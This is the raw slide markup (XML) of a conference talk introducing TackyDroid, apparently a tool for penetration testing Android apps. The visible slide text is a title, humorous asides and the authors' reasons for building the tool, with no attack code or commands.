                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2800" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Pentesting Android Applications in Style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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>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Font typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" i="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
              <a:latin typeface="Impact"/>
              <a:ea typeface="Impact"/>
              <a:cs typeface="Impact"/>
              <a:sym typeface="Impact"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1108050" x="1619250"/>
            <a:ext cy="3810000" cx="59055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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="576275"/>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Font typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" i="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
              <a:latin typeface="Impact"/>
              <a:ea typeface="Impact"/>
              <a:cs typeface="Impact"/>
              <a:sym typeface="Impact"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156" name="Shape 156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1108050" x="1619250"/>
            <a:ext cy="3810000" cx="5905500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="157" name="Shape 157"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="951250" x="1045950"/>
            <a:ext cy="3966800" cx="705208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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Shape 162"/>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Font typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" i="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
              <a:latin typeface="Impact"/>
              <a:ea typeface="Impact"/>
              <a:cs typeface="Impact"/>
              <a:sym typeface="Impact"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Shape 163"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1108050" x="1619250"/>
            <a:ext cy="3810000" cx="5905500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Shape 164"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="782613" x="1454925"/>
            <a:ext cy="4156075" cx="62341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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 169"/>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not a haxor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Shape 170"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="666948" x="1630360"/>
            <a:ext cy="4455050" cx="58832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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>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no haxor here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="Shape 176"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="575551" x="1485500"/>
            <a:ext cy="4651025" cx="61729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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 181"/>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hacker cat for sure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="689425" x="1137825"/>
            <a:ext cy="4450699" cx="68683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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Shape 187"/>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TackyDroid???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Shape 188"/>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0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Shape 189"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="1676400"/>
            <a:ext cy="4381500" cx="57150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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>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What the f@#k is TackyDroid???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Shape 195"/>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Simply put, Tackydroid is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>NOT JUST A PROXY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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Tacky </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[ `tækɪ ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sticky, not dried; 發黏的，尚未乾透的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Gaudy; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>俗不可耐的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In bad taste; 趣味低下的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>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What the f@#k is TackyDroid???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>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0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="7200" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="7200" lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not a proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="7200" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPct val="120022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Shape 206"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="520174" x="2249975"/>
            <a:ext cy="5512849" cx="440167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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 99"/>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WARNING!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>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This talk IS NOT about Android platform itself</a:t>
            </a:r>
          </a:p>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This talk IS about how we want to contribute auditing apps that run on Android systems</a:t>
            </a:r>
          </a:p>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With an additional focus on web application penetration testing</a:t>
            </a:r>
          </a:p>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Flappy bird is lame now, so we’ll play helpless hero</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1123650" x="1485900"/>
            <a:ext cy="3867150" cx="60960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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Shape 216"/>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What the f@#k is TackyDroid???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Shape 217"/>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0" marL="152400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="50000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4800" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>It’s overlaid so that makes it cool and very hipster.</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>Why we started</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Shape 223"/>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274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SAVE TIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>no need to setup up anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Bored of “information leakage” vulnerabilities</a:t>
            </a:r>
          </a:p>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Want to be hipster for once</a:t>
            </a:r>
          </a:p>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Seriously, lets bring more tools to mobile platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="152400">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Shape 228"/>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hipster m0de</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>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Speaks in conferences and travel around to avoid tedious office work(don’t tell our boss)</a:t>
            </a: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Also we wanna go use this opportunity to go home ;)</a:t>
            </a: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Not to mention the 珍珠奶茶, 鹹酥雞, 臭豆腐, 滷味, 蛋餅, 小籠包, 炸魷魚, etc….</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Shape 234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="3886200" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="811850" x="2153414"/>
            <a:ext cy="4457874" cx="4837175"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Shape 241"/>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More tools for you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>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More tools, more discussions in the security industry</a:t>
            </a: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Keep us busy on the weekend</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So no more 秋葉原 for Chris</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And no more 歌舞伎町 for Matt :(</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Wanna buy us beers?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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>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Random Stats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="4600200" cx="7153199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What is this number?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="20000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>90%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 253"/>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Crazy setups</a:t>
            </a:r>
          </a:p>
        </p:txBody>
